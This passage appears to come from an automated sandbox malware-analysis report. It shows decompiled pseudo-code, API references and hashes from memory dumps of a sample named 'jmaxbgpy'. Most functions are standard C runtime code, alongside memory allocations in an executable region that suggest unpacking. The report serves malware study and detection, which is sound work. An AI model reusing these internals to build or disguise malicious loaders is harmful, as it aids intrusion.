                                                                    					 *((intOrPtr*)(E00402FAC(_t29))) = 0x16;
                                                                    					_t17 = E00401FB1() | 0xffffffff;
                                                                    				}
                                                                    				return E00403045(_t17);
                                                                    			}







                                                                    0x00401b28
                                                                    0x00401b2a
                                                                    0x00401b2f
                                                                    0x00401b36
                                                                    0x00401b3c
                                                                    0x00401b3e
                                                                    0x00401b58
                                                                    0x00401b5e
                                                                    0x00401b5e
                                                                    0x00401b5e
                                                                    0x00401b65
                                                                    0x00401b6b
                                                                    0x00401b6e
                                                                    0x00401b75
                                                                    0x00401b7a
                                                                    0x00401b40
                                                                    0x00401b45
                                                                    0x00401b50
                                                                    0x00401b50
                                                                    0x00401b82

                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00401B58
                                                                    • __ftell_nolock.LIBCMT ref: 00401B65
                                                                      • Part of subcall function 00402FAC: __getptd_noexit.LIBCMT ref: 00402FAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2999321469-0
                                                                    • Opcode ID: 14e55a7758e5e65a41b69e13ab28e1f37792e7f131a499d92734c7bce4d85bcf
                                                                    • Instruction ID: 709f2f0c0e8031bd9a4b6ef2f4e8138c276c7f1688e4977532d7a9b7ad831426
                                                                    • Opcode Fuzzy Hash: 14e55a7758e5e65a41b69e13ab28e1f37792e7f131a499d92734c7bce4d85bcf
                                                                    • Instruction Fuzzy Hash: 3DF03770401209AADB117F75DD0675D7A70AF00769F20827FB410BA0F1DF7C8641D64D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 347 40825f-408269 348 408286-40828f 347->348 349 40826b-408275 347->349 351 408291 348->351 352 408292-408297 348->352 349->348 350 408277-408285 call 402fac 349->350 351->352 354 408299-4082aa RtlAllocateHeap 352->354 355 4082ac-4082b3 352->355 354->355 357 4082de-4082e0 354->357 358 4082d1-4082d6 355->358 359 4082b5-4082be call 4059e4 355->359 358->357 360 4082d8 358->360 359->352 363 4082c0-4082c5 359->363 360->357 364 4082c7 363->364 365 4082cd-4082cf 363->365 364->365 365->357
                                                                    C-Code - Quality: 86%
                                                                    			E0040825F(signed int _a4, signed int _a8, long _a12) {
                                                                    				void* _t10;
                                                                    				long _t11;
                                                                    				long _t12;
                                                                    				signed int _t13;
                                                                    				signed int _t17;
                                                                    				long _t19;
                                                                    				long _t24;
                                                                    
                                                                    				_t17 = _a4;
                                                                    				if(_t17 == 0) {
                                                                    					L3:
                                                                    					_t24 = _t17 * _a8;
                                                                    					__eflags = _t24;
                                                                    					if(_t24 == 0) {
                                                                    						_t24 = _t24 + 1;
                                                                    						__eflags = _t24;
                                                                    					}
                                                                    					goto L5;
                                                                    					L6:
                                                                    					_t10 = RtlAllocateHeap( *0x40e8d0, 8, _t24); // executed
                                                                    					__eflags = 0;
                                                                    					if(0 == 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					L14:
                                                                    					return _t10;
                                                                    					goto L15;
                                                                    					L7:
                                                                    					__eflags =  *0x40ed98;
                                                                    					if( *0x40ed98 == 0) {
                                                                    						_t19 = _a12;
                                                                    						__eflags = _t19;
                                                                    						if(_t19 != 0) {
                                                                    							 *_t19 = 0xc;
                                                                    						}
                                                                    					} else {
                                                                    						_t11 = E004059E4(_t10, _t24);
                                                                    						__eflags = _t11;
                                                                    						if(_t11 != 0) {
                                                                    							L5:
                                                                    							_t10 = 0;
                                                                    							__eflags = _t24 - 0xffffffe0;
                                                                    							if(_t24 > 0xffffffe0) {
                                                                    								goto L7;
                                                                    							} else {
                                                                    								goto L6;
                                                                    							}
                                                                    						} else {
                                                                    							_t12 = _a12;
                                                                    							__eflags = _t12;
                                                                    							if(_t12 != 0) {
                                                                    								 *_t12 = 0xc;
                                                                    							}
                                                                    							_t10 = 0;
                                                                    						}
                                                                    					}
                                                                    					goto L14;
                                                                    				} else {
                                                                    					_t13 = 0xffffffe0;
                                                                    					_t27 = _t13 / _t17 - _a8;
                                                                    					if(_t13 / _t17 >= _a8) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						 *((intOrPtr*)(E00402FAC(_t27))) = 0xc;
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    				L15:
                                                                    			}










                                                                    0x00408264
                                                                    0x00408269
                                                                    0x00408286
                                                                    0x0040828b
                                                                    0x0040828d
                                                                    0x0040828f
                                                                    0x00408291
                                                                    0x00408291
                                                                    0x00408291
                                                                    0x00000000
                                                                    0x00408299
                                                                    0x004082a2
                                                                    0x004082a8
                                                                    0x004082aa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004082de
                                                                    0x004082e0
                                                                    0x00000000
                                                                    0x004082ac
                                                                    0x004082ac
                                                                    0x004082b3
                                                                    0x004082d1
                                                                    0x004082d4
                                                                    0x004082d6
                                                                    0x004082d8
                                                                    0x004082d8
                                                                    0x004082b5
                                                                    0x004082b6
                                                                    0x004082bc
                                                                    0x004082be
                                                                    0x00408292
                                                                    0x00408292
                                                                    0x00408294
                                                                    0x00408297
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004082c0
                                                                    0x004082c0
                                                                    0x004082c3
                                                                    0x004082c5
                                                                    0x004082c7
                                                                    0x004082c7
                                                                    0x004082cd
                                                                    0x004082cd
                                                                    0x004082be
                                                                    0x00000000
                                                                    0x0040826b
                                                                    0x0040826f
                                                                    0x00408272
                                                                    0x00408275
                                                                    0x00000000
                                                                    0x00408277
                                                                    0x0040827c
                                                                    0x00408285
                                                                    0x00408285
                                                                    0x00408275
                                                                    0x00000000

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004057E2,?,?,00000000,00000000,00000000,?,004048D6,00000001,00000214,?,004012ED), ref: 004082A2
                                                                      • Part of subcall function 00402FAC: __getptd_noexit.LIBCMT ref: 00402FAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 328603210-0
                                                                    • Opcode ID: 9eb2fc05004ade9db367d3e3edf686b209bf981df996f113e50adda8cf401a12
                                                                    • Instruction ID: 7901897a54fc4ed2c31c700c93cc3d4108df78f05b650e2f83b925f68309407b
                                                                    • Opcode Fuzzy Hash: 9eb2fc05004ade9db367d3e3edf686b209bf981df996f113e50adda8cf401a12
                                                                    • Instruction Fuzzy Hash: 00019235201A159BEB249F65DE08B673754AF81760F05457FA895BB2D0DB3888108658
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 008A07DA: GetSystemInfo.KERNELBASE(?), ref: 008A07F7
                                                                    • VirtualAllocExNuma.KERNELBASE(00000000), ref: 008A089D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: AllocInfoNumaSystemVirtual
                                                                    • String ID:
                                                                    • API String ID: 449148690-0
                                                                    • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                    • Instruction ID: 337474895548a2b1a26419aa80953656180acf6166b2f0d83710498b4b569e3d
                                                                    • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                    • Instruction Fuzzy Hash: 80F0FF70D45708BAFB107BF88C0BB6D7668FF12301F1085A5BA50F6983DA7D56108EAB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 399 401716-40172c call 40165a
                                                                    C-Code - Quality: 25%
                                                                    			E00401716(intOrPtr _a4, intOrPtr _a8) {
                                                                    				void* __ebp;
                                                                    				void* _t3;
                                                                    				void* _t4;
                                                                    				void* _t5;
                                                                    				void* _t6;
                                                                    				void* _t9;
                                                                    
                                                                    				_push(0x40);
                                                                    				_push(_a8);
                                                                    				_push(_a4);
                                                                    				_t3 = E0040165A(_t4, _t5, _t6, _t9); // executed
                                                                    				return _t3;
                                                                    			}









                                                                    0x0040171b
                                                                    0x0040171d
                                                                    0x00401720
                                                                    0x00401723
                                                                    0x0040172c

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: __fsopen
                                                                    • String ID:
                                                                    • API String ID: 3646066109-0
                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                    • Instruction ID: da9659c0cc6eba4abe946f1c2ac35dc9690d61d84cacd30f55b562186d7b1132
                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                    • Instruction Fuzzy Hash: E8C09B7244010C77CF112983DC06E453F1A97D0764F054521FB1C191719577D9619589
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 402 404774-40477c RtlEncodePointer
                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000,0040284C,0040E190,00000314,00000000,?,?,?,?,?,0040416B,0040E190,Microsoft Visual C++ Runtime Library,00012010), ref: 00404776
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 183c3047cb35651c57a8074f315c6be241c81e26248b30cda295c1d8c993be90
                                                                    • Instruction ID: d3b70a8d7c85b53e95954520c15bd69d94c4bbfd063974eeaecd2f90818ce41a
                                                                    • Opcode Fuzzy Hash: 183c3047cb35651c57a8074f315c6be241c81e26248b30cda295c1d8c993be90
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 008A0777
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                    • Instruction ID: 5030ddb119e9b003ce70004433aefd0a9053adfa319b3391817d9ab006336983
                                                                    • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                    • Instruction Fuzzy Hash: 4F110670D00218AFEB00EBA8CC49BAEBBB4FB05304F208495E955F7691D6755E44DF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E00402B91(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                    				intOrPtr _v0;
                                                                    				void* _v804;
                                                                    				intOrPtr _v808;
                                                                    				intOrPtr _v812;
                                                                    				intOrPtr _t6;
                                                                    				intOrPtr _t11;
                                                                    				intOrPtr _t12;
                                                                    				intOrPtr _t13;
                                                                    				long _t17;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr _t25;
                                                                    				intOrPtr _t26;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr* _t31;
                                                                    				void* _t34;
                                                                    
                                                                    				_t27 = __esi;
                                                                    				_t26 = __edi;
                                                                    				_t25 = __edx;
                                                                    				_t22 = __ecx;
                                                                    				_t21 = __ebx;
                                                                    				_t6 = __eax;
                                                                    				_t34 = _t22 -  *0x40d2e4; // 0xc8347fcb
                                                                    				if(_t34 == 0) {
                                                                    					asm("repe ret");
                                                                    				}
                                                                    				 *0x40eb50 = _t6;
                                                                    				 *0x40eb4c = _t22;
                                                                    				 *0x40eb48 = _t25;
                                                                    				 *0x40eb44 = _t21;
                                                                    				 *0x40eb40 = _t27;
                                                                    				 *0x40eb3c = _t26;
                                                                    				 *0x40eb68 = ss;
                                                                    				 *0x40eb5c = cs;
                                                                    				 *0x40eb38 = ds;
                                                                    				 *0x40eb34 = es;
                                                                    				 *0x40eb30 = fs;
                                                                    				 *0x40eb2c = gs;
                                                                    				asm("pushfd");
                                                                    				_pop( *0x40eb60);
                                                                    				 *0x40eb54 =  *_t31;
                                                                    				 *0x40eb58 = _v0;
                                                                    				 *0x40eb64 =  &_a4;
                                                                    				 *0x40eaa0 = 0x10001;
                                                                    				_t11 =  *0x40eb58; // 0x0
                                                                    				 *0x40ea54 = _t11;
                                                                    				 *0x40ea48 = 0xc0000409;
                                                                    				 *0x40ea4c = 1;
                                                                    				_t12 =  *0x40d2e4; // 0xc8347fcb
                                                                    				_v812 = _t12;
                                                                    				_t13 =  *0x40d2e8; // 0x37cb8034
                                                                    				_v808 = _t13;
                                                                    				 *0x40ea98 = IsDebuggerPresent();
                                                                    				_push(1);
                                                                    				E00404CA1(_t14);
                                                                    				SetUnhandledExceptionFilter(0);
                                                                    				_t17 = UnhandledExceptionFilter("H\xef\xbf				if( *0x40ea98 == 0) {
                                                                    					_push(1);
                                                                    					E00404CA1(_t17);
                                                                    				}
                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                    			}



















                                                                    0x00402b91
                                                                    0x00402b91
                                                                    0x00402b91
                                                                    0x00402b91
                                                                    0x00402b91
                                                                    0x00402b91
                                                                    0x00402b91
                                                                    0x00402b97
                                                                    0x00402b99
                                                                    0x00402b99
                                                                    0x004060d0
                                                                    0x004060d5
                                                                    0x004060db
                                                                    0x004060e1
                                                                    0x004060e7
                                                                    0x004060ed
                                                                    0x004060f3
                                                                    0x004060fa
                                                                    0x00406101
                                                                    0x00406108
                                                                    0x0040610f
                                                                    0x00406116
                                                                    0x0040611d
                                                                    0x0040611e
                                                                    0x00406127
                                                                    0x0040612f
                                                                    0x00406137
                                                                    0x00406142
                                                                    0x0040614c
                                                                    0x00406151
                                                                    0x00406156
                                                                    0x00406160
                                                                    0x0040616a
                                                                    0x0040616f
                                                                    0x00406175
                                                                    0x0040617a
                                                                    0x00406186
                                                                    0x0040618b
                                                                    0x0040618d
                                                                    0x00406195
                                                                    0x004061a0
                                                                    0x004061ad
                                                                    0x004061af
                                                                    0x004061b1
                                                                    0x004061b6
                                                                    0x004061ca

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00406180
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00406195
                                                                    • UnhandledExceptionFilter.KERNEL32(H@), ref: 004061A0
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004061BC
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004061C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID: H@
                                                                    • API String ID: 2579439406-3372785075
                                                                    • Opcode ID: 433cb55fc5cb084cbf637b04e4544d34fba8481b31729b0ace35a93c0ab3f4bb
                                                                    • Instruction ID: d9ac717fd898719bc5ea84c0380edb4ba731aa4a6496c983d9893efecd963c5a
                                                                    • Opcode Fuzzy Hash: 433cb55fc5cb084cbf637b04e4544d34fba8481b31729b0ace35a93c0ab3f4bb
                                                                    • Instruction Fuzzy Hash: 882105B5901304CFE314EF66FB856447BB0BB48304F10483AE90AB36A0E77864A5CF0E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00403FFA() {
                                                                    
                                                                    				SetUnhandledExceptionFilter(E00403FB8);
                                                                    				return 0;
                                                                    			}



                                                                    0x00403fff
                                                                    0x00404007

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00003FB8), ref: 00403FFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: a2a0dab81460b61084c0f5edc811778a94778a670a533327d7ca988b2b3fe760
                                                                    • Instruction ID: a38052456623c9a22464005c58749befdfc6ce22b6a0784246dbb498b670ad6e
                                                                    • Opcode Fuzzy Hash: a2a0dab81460b61084c0f5edc811778a94778a670a533327d7ca988b2b3fe760
                                                                    • Instruction Fuzzy Hash: 939002A065125696C6001F745D0DA4579A86AC864776144B1A001F48D5FA744154655A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                    • Instruction ID: fdb37410c42bf7bf6417bc16fc1a2463d70678fe9782f2c0d3f5c4e42a8494dc
                                                                    • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                    • Instruction Fuzzy Hash: B1118635500119AFE710DF69C884DADB7E9FF557A47148016FC55CB611E338DD81CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                    • Instruction ID: a6d2eaef7ce6ad27511156b6d41f5bf8586540dbf80af59dc50383f9ff0a88bd
                                                                    • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                    • Instruction Fuzzy Hash: ACE01A35664549EFEB44CBA8CD81E65B3F8FB0A324B144290F925C77A2E634EE00DE50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                    • Instruction ID: bbc236e7de9546136c437bfdd71a3ff7059c5108b44ab0ae737c5c1155dc9ed1
                                                                    • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                    • Instruction Fuzzy Hash: 3DE04F362106149BD7619B59C844DD6F7E8FB8A7B0B494425ED49D7A11C230FC01CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 62%
                                                                    			E00404A6D(void* __ebx, void* __edx) {
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				_Unknown_base(*)()* _t7;
                                                                    				long _t10;
                                                                    				void* _t11;
                                                                    				int _t12;
                                                                    				void* _t14;
                                                                    				void* _t15;
                                                                    				void* _t16;
                                                                    				void* _t18;
                                                                    				intOrPtr _t21;
                                                                    				long _t26;
                                                                    				void* _t30;
                                                                    				void* _t35;
                                                                    				struct HINSTANCE__* _t36;
                                                                    				intOrPtr* _t37;
                                                                    				void* _t40;
                                                                    				intOrPtr* _t42;
                                                                    				void* _t43;
                                                                    
                                                                    				_t35 = __edx;
                                                                    				_t30 = __ebx;
                                                                    				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                    				if(_t36 != 0) {
                                                                    					 *0x40e8c0 = GetProcAddress(_t36, "FlsAlloc");
                                                                    					 *0x40e8c4 = GetProcAddress(_t36, "FlsGetValue");
                                                                    					 *0x40e8c8 = GetProcAddress(_t36, "FlsSetValue");
                                                                    					_t7 = GetProcAddress(_t36, "FlsFree");
                                                                    					__eflags =  *0x40e8c0;
                                                                    					_t40 = TlsSetValue;
                                                                    					 *0x40e8cc = _t7;
                                                                    					if( *0x40e8c0 == 0) {
                                                                    						L6:
                                                                    						 *0x40e8c4 = TlsGetValue;
                                                                    						 *0x40e8c0 = E0040477D;
                                                                    						 *0x40e8c8 = _t40;
                                                                    						 *0x40e8cc = TlsFree;
                                                                    					} else {
                                                                    						__eflags =  *0x40e8c4;
                                                                    						if( *0x40e8c4 == 0) {
                                                                    							goto L6;
                                                                    						} else {
                                                                    							__eflags =  *0x40e8c8;
                                                                    							if( *0x40e8c8 == 0) {
                                                                    								goto L6;
                                                                    							} else {
                                                                    								__eflags = _t7;
                                                                    								if(_t7 == 0) {
                                                                    									goto L6;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_t10 = TlsAlloc();
                                                                    					 *0x40d5a4 = _t10;
                                                                    					__eflags = _t10 - 0xffffffff;
                                                                    					if(_t10 == 0xffffffff) {
                                                                    						L15:
                                                                    						_t11 = 0;
                                                                    						__eflags = 0;
                                                                    					} else {
                                                                    						_t12 = TlsSetValue(_t10,  *0x40e8c4);
                                                                    						__eflags = _t12;
                                                                    						if(_t12 == 0) {
                                                                    							goto L15;
                                                                    						} else {
                                                                    							E0040238B();
                                                                    							_t42 = __imp__EncodePointer;
                                                                    							_t14 =  *_t42( *0x40e8c0);
                                                                    							 *0x40e8c0 = _t14;
                                                                    							_t15 =  *_t42( *0x40e8c4);
                                                                    							 *0x40e8c4 = _t15;
                                                                    							_t16 =  *_t42( *0x40e8c8);
                                                                    							 *0x40e8c8 = _t16;
                                                                    							 *0x40e8cc =  *_t42( *0x40e8cc);
                                                                    							_t18 = E004055DA();
                                                                    							__eflags = _t18;
                                                                    							if(_t18 == 0) {
                                                                    								L14:
                                                                    								E004047BA();
                                                                    								goto L15;
                                                                    							} else {
                                                                    								_t37 = __imp__DecodePointer;
                                                                    								_t21 =  *((intOrPtr*)( *_t37()))( *0x40e8c0, E0040493E);
                                                                    								 *0x40d5a0 = _t21;
                                                                    								__eflags = _t21 - 0xffffffff;
                                                                    								if(_t21 == 0xffffffff) {
                                                                    									goto L14;
                                                                    								} else {
                                                                    									_t43 = E004057CC(1, 0x214);
                                                                    									__eflags = _t43;
                                                                    									if(_t43 == 0) {
                                                                    										goto L14;
                                                                    									} else {
                                                                    										__eflags =  *((intOrPtr*)( *_t37()))( *0x40e8c8,  *0x40d5a0, _t43);
                                                                    										if(__eflags == 0) {
                                                                    											goto L14;
                                                                    										} else {
                                                                    											_push(0);
                                                                    											_push(_t43);
                                                                    											E004047F7(_t30, _t35, _t37, _t43, __eflags);
                                                                    											_t26 = GetCurrentThreadId();
                                                                    											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                    											 *_t43 = _t26;
                                                                    											_t11 = 1;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					return _t11;
                                                                    				} else {
                                                                    					E004047BA();
                                                                    					return 0;
                                                                    				}
                                                                    			}






















                                                                    0x00404a6d
                                                                    0x00404a6d
                                                                    0x00404a7b
                                                                    0x00404a7f
                                                                    0x00404a9f
                                                                    0x00404aac
                                                                    0x00404ab9
                                                                    0x00404abe
                                                                    0x00404ac0
                                                                    0x00404ac7
                                                                    0x00404acd
                                                                    0x00404ad2
                                                                    0x00404aea
                                                                    0x00404aef
                                                                    0x00404af9
                                                                    0x00404b03
                                                                    0x00404b09
                                                                    0x00404ad4
                                                                    0x00404ad4
                                                                    0x00404adb
                                                                    0x00000000
                                                                    0x00404add
                                                                    0x00404add
                                                                    0x00404ae4
                                                                    0x00000000
                                                                    0x00404ae6
                                                                    0x00404ae6
                                                                    0x00404ae8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404ae8
                                                                    0x00404ae4
                                                                    0x00404adb
                                                                    0x00404b0e
                                                                    0x00404b14
                                                                    0x00404b19
                                                                    0x00404b1c
                                                                    0x00404be3
                                                                    0x00404be3
                                                                    0x00404be3
                                                                    0x00404b22
                                                                    0x00404b29
                                                                    0x00404b2b
                                                                    0x00404b2d
                                                                    0x00000000
                                                                    0x00404b33
                                                                    0x00404b33
                                                                    0x00404b3e
                                                                    0x00404b44
                                                                    0x00404b4c
                                                                    0x00404b51
                                                                    0x00404b59
